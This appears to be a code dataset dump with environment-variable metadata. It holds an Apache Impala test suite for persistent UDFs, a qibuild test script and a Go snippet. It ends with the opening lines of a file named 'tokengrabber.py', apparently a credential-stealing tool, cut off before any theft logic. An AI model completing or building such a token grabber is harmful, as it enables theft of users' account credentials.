fmt.Fprintf(w, "Version: 1.0.0\n")
fmt.Fprintf(w, "Hostname: %s\n", host)
}
// [END container_hello_app]
| [
"\"PORT\""
]
| []
| [
"PORT"
]
| [] | ["PORT"] | go | 1 | 0 | |
tests/custom_cluster/test_permanent_udfs.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import glob
import os
import pytest
import re
import shutil
import subprocess
from tempfile import mkdtemp
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.skip import (SkipIfS3, SkipIfABFS, SkipIfADLS, SkipIfIsilon, SkipIfGCS,
SkipIfLocal)
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.util.filesystem_utils import get_fs_path
class TestUdfPersistence(CustomClusterTestSuite):
""" Tests the behavior of UDFs and UDAs between catalog restarts. With IMPALA-1748,
these functions are persisted to the metastore and are loaded again during catalog
startup"""
DATABASE = 'udf_permanent_test'
JAVA_FN_TEST_DB = 'java_permanent_test'
HIVE_IMPALA_INTEGRATION_DB = 'hive_impala_integration_db'
HIVE_UDF_JAR = os.getenv('DEFAULT_FS') + '/test-warehouse/hive-exec.jar';
JAVA_UDF_JAR = os.getenv('DEFAULT_FS') + '/test-warehouse/impala-hive-udfs.jar';
LOCAL_LIBRARY_DIR = mkdtemp(dir="/tmp")
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def setup_class(cls):
if cls.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
super(TestUdfPersistence, cls).setup_class()
@classmethod
def add_test_dimensions(cls):
super(TestUdfPersistence, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
def setup_method(self, method):
super(TestUdfPersistence, self).setup_method(method)
impalad = self.cluster.impalads[0]
self.client = impalad.service.create_beeswax_client()
self.__cleanup()
self.__load_drop_functions(
self.CREATE_UDFS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libTestUdfs.so'))
self.__load_drop_functions(
self.DROP_SAMPLE_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libudasample.so'))
self.__load_drop_functions(
self.CREATE_SAMPLE_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libudasample.so'))
self.__load_drop_functions(
self.CREATE_TEST_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libTestUdas.so'))
self.uda_count =\
self.CREATE_SAMPLE_UDAS_TEMPLATE.count("create aggregate function") +\
self.CREATE_TEST_UDAS_TEMPLATE.count("create aggregate function")
self.udf_count = self.CREATE_UDFS_TEMPLATE.count("create function")
self.client.execute("CREATE DATABASE IF NOT EXISTS %s" % self.JAVA_FN_TEST_DB)
self.client.execute("CREATE DATABASE IF NOT EXISTS %s" %
self.HIVE_IMPALA_INTEGRATION_DB)
def teardown_method(self, method):
self.__cleanup()
def __cleanup(self):
self.client.execute("DROP DATABASE IF EXISTS %s CASCADE" % self.DATABASE)
self.client.execute("DROP DATABASE IF EXISTS %s CASCADE" % self.JAVA_FN_TEST_DB)
self.client.execute("DROP DATABASE IF EXISTS %s CASCADE"
% self.HIVE_IMPALA_INTEGRATION_DB)
shutil.rmtree(self.LOCAL_LIBRARY_DIR, ignore_errors=True)
def __load_drop_functions(self, template, database, location):
queries = template.format(database=database, location=location)
# Split queries and remove empty lines
queries = [q for q in queries.split(';') if q.strip()]
for query in queries:
result = self.client.execute(query)
assert result is not None
def __restart_cluster(self):
self._stop_impala_cluster()
self._start_impala_cluster(list())
impalad = self.cluster.impalads[0]
self.client = impalad.service.create_beeswax_client()
def verify_function_count(self, query, count):
result = self.client.execute(query)
assert result is not None and len(result.data) == count
@pytest.mark.execute_serially
def test_permanent_udfs(self):
# Make sure the pre-calculated count tallies with the number of
# functions shown using "show [aggregate] functions" statement
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.DATABASE), self.udf_count);
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), self.uda_count)
# invalidate metadata and make sure the count tallies
result = self.client.execute("INVALIDATE METADATA")
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.DATABASE), self.udf_count);
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), self.uda_count)
# Restart the cluster, this triggers a full metadata reload
self.__restart_cluster()
# Make sure the counts of udfs and udas match post restart
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.DATABASE), self.udf_count);
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), self.uda_count)
# Drop sample udas and verify the count matches pre and post restart
self.__load_drop_functions(
self.DROP_SAMPLE_UDAS_TEMPLATE, self.DATABASE,
get_fs_path('/test-warehouse/libudasample.so'))
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), 1)
self.__restart_cluster()
self.verify_function_count(
"SHOW AGGREGATE FUNCTIONS in {0}".format(self.DATABASE), 1)
def __verify_udf_in_hive(self, udf):
(query, result) = self.SAMPLE_JAVA_UDFS_TEST[udf]
stdout = self.run_stmt_in_hive("select " + query.format(
db=self.HIVE_IMPALA_INTEGRATION_DB))
assert stdout is not None and result in str(stdout)
def __verify_udf_in_impala(self, udf):
(query, result) = self.SAMPLE_JAVA_UDFS_TEST[udf]
stdout = self.client.execute("select " + query.format(
db=self.HIVE_IMPALA_INTEGRATION_DB))
assert stdout is not None and result in str(stdout.data)
def __describe_udf_in_hive(self, udf, db=HIVE_IMPALA_INTEGRATION_DB):
""" Describe the specified function, returning stdout. """
# Hive 2+ caches UDFs, so we have to explicitly invalidate the UDF if
# we've made changes on the Impala side.
stmt = "RELOAD FUNCTION ; DESCRIBE FUNCTION {0}.{1}".format(db, udf)
return self.run_stmt_in_hive(stmt)
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
def test_corrupt_java_udf(self):
""" IMPALA-3820: This tests if the Catalog server can gracefully handle
Java UDFs with unresolved dependencies."""
if self.exploration_strategy() != 'exhaustive': pytest.skip()
# Create a Java UDF with unresolved dependencies from Hive and
# restart the Catalog server. Catalog should ignore the
# function load.
self.run_stmt_in_hive("create function %s.corrupt_udf as \
'org.apache.impala.UnresolvedUdf' using jar '%s'"
% (self.JAVA_FN_TEST_DB, self.JAVA_UDF_JAR))
self.__restart_cluster()
# Make sure the function count is 0
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.JAVA_FN_TEST_DB), 0)
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
catalogd_args= "--local_library_dir={0}".format(LOCAL_LIBRARY_DIR))
def test_java_udfs_hive_integration(self):
''' This test checks the integration between Hive and Impala on
CREATE FUNCTION and DROP FUNCTION statements for persistent Java UDFs.
The main objective of the test is to check the following four cases.
- Add Java UDFs from Impala and make sure they are visible in Hive
- Drop Java UDFs from Impala and make sure this reflects in Hive.
- Add Java UDFs from Hive and make sure they are visitble in Impala
- Drop Java UDFs from Hive and make sure this reflects in Impala
'''
# Add Java UDFs from Impala and check if they are visible in Hive.
# Hive has bug that doesn't display the permanent function in show functions
# statement. So this test relies on describe function statement which prints
# a message if the function is not present.
udfs_to_test = list(self.SAMPLE_JAVA_UDFS)
if int(os.environ['IMPALA_HIVE_MAJOR_VERSION']) == 2:
udfs_to_test += self.SAMPLE_JAVA_UDFS_HIVE2_ONLY
for (fn, fn_symbol) in udfs_to_test:
self.client.execute(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn))
self.client.execute(self.CREATE_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn,
location=self.HIVE_UDF_JAR, symbol=fn_symbol))
hive_stdout = self.__describe_udf_in_hive(fn)
assert "does not exist" not in hive_stdout
self.__verify_udf_in_hive(fn)
# Drop the function from Impala and check if it reflects in Hive.
self.client.execute(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn))
hive_stdout = self.__describe_udf_in_hive(fn)
assert "does not exist" in hive_stdout
# Create the same set of functions from Hive and make sure they are visible
# in Impala. There are two ways to make functions visible in Impala: invalidate
# metadata and refresh functions <db>.
REFRESH_COMMANDS = ["INVALIDATE METADATA",
"REFRESH FUNCTIONS {0}".format(self.HIVE_IMPALA_INTEGRATION_DB)]
for refresh_command in REFRESH_COMMANDS:
for (fn, fn_symbol) in udfs_to_test:
self.run_stmt_in_hive(self.CREATE_HIVE_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn,
location=self.HIVE_UDF_JAR, symbol=fn_symbol))
self.client.execute(refresh_command)
for (fn, fn_symbol) in udfs_to_test:
result = self.client.execute("SHOW FUNCTIONS IN {0}".format(
self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) > 0 and\
fn in str(result.data)
self.__verify_udf_in_impala(fn)
# Drop the function in Hive and make sure it reflects in Impala.
self.run_stmt_in_hive(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.HIVE_IMPALA_INTEGRATION_DB, function=fn))
self.client.execute(refresh_command)
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.HIVE_IMPALA_INTEGRATION_DB), 0)
# Make sure we deleted all the temporary jars we copied to the local fs
assert len(glob.glob(self.LOCAL_LIBRARY_DIR + "/*.jar")) == 0
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
catalogd_args= "--local_library_dir={0}".format(LOCAL_LIBRARY_DIR))
def test_refresh_native(self):
''' This test checks that a native function is visible in Impala after a
REFRESH FUNCTIONS command. We will add the native function through Hive
by setting DBPROPERTIES of a database.'''
# First we create the function in Impala.
create_func_impala = ("create function {database}.identity_tmp(bigint) "
"returns bigint location '{location}' symbol='Identity'")
self.client.execute(create_func_impala.format(
database=self.HIVE_IMPALA_INTEGRATION_DB,
location=get_fs_path('/test-warehouse/libTestUdfs.so')))
# Impala puts the native function into a database property table. We extract the key
# value pair that represents the function from the table.
describe_db_hive = "DESCRIBE DATABASE EXTENDED {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB)
result = self.run_stmt_in_hive(describe_db_hive)
regex = r"{.*(impala_registered_function.*?)=(.*?)[,}]"
match = re.search(regex, result)
func_name = match.group(1)
func_contents = match.group(2)
# Recreate the database, this deletes the function.
self.client.execute("DROP DATABASE {database} CASCADE".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
self.client.execute("CREATE DATABASE {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) == 0
# Place the function into the recreated database by modifying it's properties.
alter_db_hive = "ALTER DATABASE {database} SET DBPROPERTIES ('{fn_name}'='{fn_val}')"
self.run_stmt_in_hive(alter_db_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB,
fn_name=func_name,
fn_val=func_contents))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) == 0
# The function should be visible in Impala after a REFRESH FUNCTIONS.
self.client.execute("REFRESH FUNCTIONS {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) > 0 and\
"identity_tmp" in str(result.data)
# Verify that the function returns a correct result.
result = self.client.execute("SELECT {database}.identity_tmp(10)".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result.data[0] == "10"
# Make sure we deleted all the temporary jars we copied to the local fs
assert len(glob.glob(self.LOCAL_LIBRARY_DIR + "/*.jar")) == 0
@SkipIfIsilon.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfLocal.hive
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
catalogd_args= "--local_library_dir={0}".format(LOCAL_LIBRARY_DIR))
def test_refresh_replace(self):
''' This test checks that if we drop a function and then create a
different function with the same name in Hive, the new function will
be visible in Impala after REFRESH FUNCTIONS.'''
# Create an original function.
create_orig_func_hive = ("create function {database}.test_func as "
"'org.apache.hadoop.hive.ql.udf.UDFHex' using jar '{jar}'")
self.run_stmt_in_hive(create_orig_func_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB, jar=self.JAVA_UDF_JAR))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result is not None and len(result.data) == 0
# Verify the function becomes visible in Impala after REFRESH FUNCTIONS.
self.client.execute("REFRESH FUNCTIONS {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert (result is not None and len(result.data) == 3 and
"test_func" in str(result.data))
result = self.client.execute("SELECT {database}.test_func(123)".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result.data[0] == "7B"
# Drop the original function and create a different function with the same name as
# the original, but a different JAR.
drop_orig_func_hive = "DROP FUNCTION {database}.test_func"
self.run_stmt_in_hive(drop_orig_func_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
create_replacement_func_hive = ("create function {database}.test_func as "
"'org.apache.hadoop.hive.ql.udf.UDFBin' using jar '{jar}'")
self.run_stmt_in_hive(create_replacement_func_hive.format(
database=self.HIVE_IMPALA_INTEGRATION_DB, jar=self.JAVA_UDF_JAR))
self.client.execute("REFRESH FUNCTIONS {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
result = self.client.execute("SHOW FUNCTIONS IN {database}".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert (result is not None and len(result.data) == 1 and
"test_func" in str(result.data))
# Verify that the function has actually been updated.
result = self.client.execute("SELECT {database}.test_func(123)".format(
database=self.HIVE_IMPALA_INTEGRATION_DB))
assert result.data[0] == "1111011"
# Make sure we deleted all the temporary jars we copied to the local fs
assert len(glob.glob(self.LOCAL_LIBRARY_DIR + "/*.jar")) == 0
@pytest.mark.execute_serially
def test_java_udfs_from_impala(self):
""" This tests checks the behavior of permanent Java UDFs in Impala."""
self.verify_function_count(
"SHOW FUNCTIONS in {0}".format(self.JAVA_FN_TEST_DB), 0);
# Create a non persistent Java UDF and make sure we can't create a
# persistent Java UDF with same name
self.client.execute("create function %s.%s(boolean) returns boolean "\
"location '%s' symbol='%s'" % (self.JAVA_FN_TEST_DB, "identity",
self.JAVA_UDF_JAR, "org.apache.impala.TestUdf"))
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB,
function="identity", location=self.JAVA_UDF_JAR,
symbol="org.apache.impala.TestUdf"))
assert "Function already exists" in str(result)
# Test the same with a NATIVE function
self.client.execute("create function {database}.identity(int) "\
"returns int location '{location}' symbol='Identity'".format(
database=self.JAVA_FN_TEST_DB,
location="/test-warehouse/libTestUdfs.so"))
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB,
function="identity", location=self.JAVA_UDF_JAR,
symbol="org.apache.impala.TestUdf"))
assert "Function already exists" in str(result)
# Test the reverse. Add a persistent Java UDF and ensure we cannot
# add non persistent Java UDFs or NATIVE functions with the same name.
self.client.execute(self.CREATE_JAVA_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="identity_java",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.TestUdf"))
result = self.execute_query_expect_failure(self.client, "create function "\
"%s.%s(boolean) returns boolean location '%s' symbol='%s'" % (
self.JAVA_FN_TEST_DB, "identity_java", self.JAVA_UDF_JAR,
"org.apache.impala.TestUdf"))
assert "Function already exists" in str(result)
result = self.execute_query_expect_failure(self.client, "create function "\
"{database}.identity_java(int) returns int location '{location}' "\
"symbol='Identity'".format(database=self.JAVA_FN_TEST_DB,
location="/test-warehouse/libTestUdfs.so"))
assert "Function already exists" in str(result)
# With IF NOT EXISTS, the query shouldn't fail.
result = self.execute_query_expect_success(self.client, "create function "\
" if not exists {database}.identity_java(int) returns int location "\
"'{location}' symbol='Identity'".format(database=self.JAVA_FN_TEST_DB,
location="/test-warehouse/libTestUdfs.so"))
result = self.client.execute("SHOW FUNCTIONS in %s" % self.JAVA_FN_TEST_DB)
self.execute_query_expect_success(self.client,
"DROP FUNCTION IF EXISTS {db}.impala_java".format(db=self.JAVA_FN_TEST_DB))
# Drop the persistent Java function.
# Test the same create with IF NOT EXISTS. No exception should be thrown.
# Add a Java udf which has a few incompatible 'evaluate' functions in the
# symbol class. Catalog should load only the compatible ones. JavaUdfTest
# has 8 evaluate signatures out of which only 3 are valid.
compatibility_fn_count = 3
self.client.execute(self.CREATE_JAVA_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="compatibility",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.JavaUdfTest"))
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB,
compatibility_fn_count)
result = self.client.execute("SHOW FUNCTIONS in %s" % self.JAVA_FN_TEST_DB)
function_count = len(result.data)
# Invalidating metadata should preserve all the functions
self.client.execute("INVALIDATE METADATA")
self.verify_function_count(
"SHOW FUNCTIONS IN %s" % self.JAVA_FN_TEST_DB, function_count)
# Restarting the cluster should preserve only the persisted functions. In
# this case, identity(boolean) should be wiped out.
self.__restart_cluster()
self.verify_function_count(
"SHOW FUNCTIONS IN %s" % self.JAVA_FN_TEST_DB, function_count-1)
# Dropping persisted Java UDFs with old syntax should raise an exception
self.execute_query_expect_failure(self.client,
"DROP FUNCTION compatibility(smallint)")
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB, 3)
# Drop the functions and make sure they don't appear post restart.
self.client.execute("DROP FUNCTION %s.compatibility" % self.JAVA_FN_TEST_DB)
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB, 0)
self.__restart_cluster()
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'compatibility*'" % self.JAVA_FN_TEST_DB, 0)
# Try to load a UDF that has no compatible signatures. Make sure it is not added
# to Hive and Impala.
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB, function="badudf",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.IncompatibleUdfTest"))
assert "No compatible function signatures" in str(result)
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'badudf*'" % self.JAVA_FN_TEST_DB, 0)
result = self.__describe_udf_in_hive('badudf', db=self.JAVA_FN_TEST_DB)
assert "does not exist" in str(result)
# Create the same function from hive and make sure Impala doesn't load any signatures.
self.run_stmt_in_hive(self.CREATE_HIVE_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="badudf",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.IncompatibleUdfTest"))
result = self.__describe_udf_in_hive('badudf', db=self.JAVA_FN_TEST_DB)
assert "does not exist" not in str(result)
self.client.execute("INVALIDATE METADATA")
self.verify_function_count(
"SHOW FUNCTIONS IN %s like 'badudf*'" % self.JAVA_FN_TEST_DB, 0)
# Add a function with the same name from Impala. It should fail.
result = self.execute_query_expect_failure(self.client,
self.CREATE_JAVA_UDF_TEMPLATE.format(db=self.JAVA_FN_TEST_DB, function="badudf",
location=self.JAVA_UDF_JAR, symbol="org.apache.impala.TestUdf"))
assert "Function badudf already exists" in str(result)
# Drop the function and make sure the function if dropped from hive
self.client.execute(self.DROP_JAVA_UDF_TEMPLATE.format(
db=self.JAVA_FN_TEST_DB, function="badudf"))
result = self.__describe_udf_in_hive('badudf', db=self.JAVA_FN_TEST_DB)
assert "does not exist" in str(result)
# Create sample UDA functions in {database} from library {location}
DROP_SAMPLE_UDAS_TEMPLATE = """
drop function if exists {database}.test_count(int);
drop function if exists {database}.hll(int);
drop function if exists {database}.sum_small_decimal(decimal(9,2));
"""
CREATE_JAVA_UDF_TEMPLATE = """
CREATE FUNCTION {db}.{function} LOCATION '{location}' symbol='{symbol}'
"""
CREATE_HIVE_UDF_TEMPLATE = """
CREATE FUNCTION {db}.{function} as '{symbol}' USING JAR '{location}'
"""
DROP_JAVA_UDF_TEMPLATE = "DROP FUNCTION IF EXISTS {db}.{function}"
# Sample java udfs from hive-exec.jar. Function name to symbol class mapping
SAMPLE_JAVA_UDFS = [
('udfpi', 'org.apache.hadoop.hive.ql.udf.UDFPI'),
('udfbin', 'org.apache.hadoop.hive.ql.udf.UDFBin'),
('udfhex', 'org.apache.hadoop.hive.ql.udf.UDFHex'),
('udfconv', 'org.apache.hadoop.hive.ql.udf.UDFConv'),
('udflike', 'org.apache.hadoop.hive.ql.udf.UDFLike'),
('udfsign', 'org.apache.hadoop.hive.ql.udf.UDFSign'),
('udfascii','org.apache.hadoop.hive.ql.udf.UDFAscii')
]
# These UDFs are available in Hive 2 but in Hive 3 are now implemented
# using a new GenericUDF interface that we don't support.
SAMPLE_JAVA_UDFS_HIVE2_ONLY = [
('udfhour', 'org.apache.hadoop.hive.ql.udf.UDFHour'),
('udfyear', 'org.apache.hadoop.hive.ql.udf.UDFYear'),
]
# Simple tests to verify java udfs in SAMPLE_JAVA_UDFS
SAMPLE_JAVA_UDFS_TEST = {
'udfpi' : ('{db}.udfpi()', '3.141592653589793'),
'udfbin' : ('{db}.udfbin(123)', '1111011'),
'udfhex' : ('{db}.udfhex(123)', '7B'),
'udfconv' : ('{db}.udfconv("100", 2, 10)', '4'),
'udfhour' : ('{db}.udfhour("12:55:12")', '12'),
'udflike' : ('{db}.udflike("abc", "def")', 'false'),
'udfsign' : ('{db}.udfsign(0)', '0'),
'udfyear' : ('{db}.udfyear("1990-02-06")', '1990'),
'udfascii' : ('{db}.udfascii("abc")','97')
}
CREATE_SAMPLE_UDAS_TEMPLATE = """
create database if not exists {database};
create aggregate function {database}.test_count(int) returns bigint
location '{location}' update_fn='CountUpdate';
create aggregate function {database}.hll(int) returns string
location '{location}' update_fn='HllUpdate';
create aggregate function {database}.sum_small_decimal(decimal(9,2))
returns decimal(9,2) location '{location}' update_fn='SumSmallDecimalUpdate';
"""
# Create test UDA functions in {database} from library {location}
CREATE_TEST_UDAS_TEMPLATE = """
drop function if exists {database}.trunc_sum(double);
create database if not exists {database};
create aggregate function {database}.trunc_sum(double)
returns bigint intermediate double location '{location}'
update_fn='TruncSumUpdate' merge_fn='TruncSumMerge'
serialize_fn='TruncSumSerialize' finalize_fn='TruncSumFinalize';
"""
# Create test UDF functions in {database} from library {location}
CREATE_UDFS_TEMPLATE = """
drop function if exists {database}.identity(boolean);
drop function if exists {database}.identity(tinyint);
drop function if exists {database}.identity(smallint);
drop function if exists {database}.identity(int);
drop function if exists {database}.identity(bigint);
drop function if exists {database}.identity(float);
drop function if exists {database}.identity(double);
drop function if exists {database}.identity(string);
drop function if exists {database}.identity(timestamp);
drop function if exists {database}.identity(date);
drop function if exists {database}.identity(decimal(9,0));
drop function if exists {database}.identity(decimal(18,1));
drop function if exists {database}.identity(decimal(38,10));
drop function if exists {database}.all_types_fn(
string, boolean, tinyint, smallint, int, bigint, float, double, decimal(2,0),
date);
drop function if exists {database}.no_args();
drop function if exists {database}.var_and(boolean...);
drop function if exists {database}.var_sum(int...);
drop function if exists {database}.var_sum(double...);
drop function if exists {database}.var_sum(string...);
drop function if exists {database}.var_sum(decimal(4,2)...);
drop function if exists {database}.var_sum_multiply(double, int...);
drop function if exists {database}.constant_timestamp();
drop function if exists {database}.constant_date();
drop function if exists {database}.validate_arg_type(string);
drop function if exists {database}.count_rows();
drop function if exists {database}.constant_arg(int);
drop function if exists {database}.validate_open(int);
drop function if exists {database}.mem_test(bigint);
drop function if exists {database}.mem_test_leaks(bigint);
drop function if exists {database}.unmangled_symbol();
drop function if exists {database}.four_args(int, int, int, int);
drop function if exists {database}.five_args(int, int, int, int, int);
drop function if exists {database}.six_args(int, int, int, int, int, int);
drop function if exists {database}.seven_args(int, int, int, int, int, int, int);
drop function if exists {database}.eight_args(int, int, int, int, int, int, int, int);
create database if not exists {database};
create function {database}.identity(boolean) returns boolean
location '{location}' symbol='Identity';
create function {database}.identity(tinyint) returns tinyint
location '{location}' symbol='Identity';
create function {database}.identity(smallint) returns smallint
location '{location}' symbol='Identity';
create function {database}.identity(int) returns int
location '{location}' symbol='Identity';
create function {database}.identity(bigint) returns bigint
location '{location}' symbol='Identity';
create function {database}.identity(float) returns float
location '{location}' symbol='Identity';
create function {database}.identity(double) returns double
location '{location}' symbol='Identity';
create function {database}.identity(string) returns string
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_9StringValE';
create function {database}.identity(timestamp) returns timestamp
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_12TimestampValE';
create function {database}.identity(date) returns date
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_7DateValE';
create function {database}.identity(decimal(9,0)) returns decimal(9,0)
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_10DecimalValE';
create function {database}.identity(decimal(18,1)) returns decimal(18,1)
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_10DecimalValE';
create function {database}.identity(decimal(38,10)) returns decimal(38,10)
location '{location}'
symbol='_Z8IdentityPN10impala_udf15FunctionContextERKNS_10DecimalValE';
create function {database}.all_types_fn(
string, boolean, tinyint, smallint, int, bigint, float, double, decimal(2,0),
date)
returns int
location '{location}' symbol='AllTypes';
create function {database}.no_args() returns string
location '{location}'
symbol='_Z6NoArgsPN10impala_udf15FunctionContextE';
create function {database}.var_and(boolean...) returns boolean
location '{location}' symbol='VarAnd';
create function {database}.var_sum(int...) returns int
location '{location}' symbol='VarSum';
create function {database}.var_sum(double...) returns double
location '{location}' symbol='VarSum';
create function {database}.var_sum(string...) returns int
location '{location}' symbol='VarSum';
create function {database}.var_sum(decimal(4,2)...) returns decimal(18,2)
location '{location}' symbol='VarSum';
create function {database}.var_sum_multiply(double, int...) returns double
location '{location}'
symbol='_Z14VarSumMultiplyPN10impala_udf15FunctionContextERKNS_9DoubleValEiPKNS_6IntValE';
create function {database}.constant_timestamp() returns timestamp
location '{location}' symbol='ConstantTimestamp';
create function {database}.constant_date() returns date
location '{location}' symbol='ConstantDate';
create function {database}.validate_arg_type(string) returns boolean
location '{location}' symbol='ValidateArgType';
create function {database}.count_rows() returns bigint
location '{location}' symbol='Count' prepare_fn='CountPrepare' close_fn='CountClose';
create function {database}.constant_arg(int) returns int
location '{location}' symbol='ConstantArg' prepare_fn='ConstantArgPrepare' close_fn='ConstantArgClose';
create function {database}.validate_open(int) returns boolean
location '{location}' symbol='ValidateOpen'
prepare_fn='ValidateOpenPrepare' close_fn='ValidateOpenClose';
create function {database}.mem_test(bigint) returns bigint
location '{location}' symbol='MemTest'
prepare_fn='MemTestPrepare' close_fn='MemTestClose';
create function {database}.mem_test_leaks(bigint) returns bigint
location '{location}' symbol='MemTest'
prepare_fn='MemTestPrepare';
"""
| []
| []
| [
"IMPALA_HIVE_MAJOR_VERSION",
"DEFAULT_FS"
]
| [] | ["IMPALA_HIVE_MAJOR_VERSION", "DEFAULT_FS"] | python | 2 | 0 | |
python/qibuild/test/projects/usefoopymodule/test.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2019 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
"""
This is an equivalent of a C++ program trying to load a
Python module using libqi, but written in Python.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import os
import sys
def main():
""" Main Entry Point """
from_env = os.environ.get("QI_ADDITIONAL_SDK_PREFIXES")
if not from_env:
sys.exit("QI_ADDITIONAL_SDK_PREFIXES not set")
prefixes = from_env.split(os.path.pathsep)
found = False
for prefix in prefixes:
candidate = os.path.join(prefix, "share", "qi", "module", "foo.mod")
if os.path.exists(candidate):
found = True
with open(candidate, "r") as fp:
contents = fp.read()
if contents != "python\n":
sys.exit("Expected python\\n, got: " + contents)
if not found:
sys.exit("foo.mod not found")
import foo
if __name__ == "__main__":
main()
| []
| []
| [
"QI_ADDITIONAL_SDK_PREFIXES"
]
| [] | ["QI_ADDITIONAL_SDK_PREFIXES"] | python | 1 | 0 | |
Additional_File/6_TokenGrab/tokengrabber.py | from colorama import Fore
import time, sys, os, ctypes, shutil
def tokengrabber():
def spinner():
l = ['|', '/', '-', '\\']
for i in l+l:
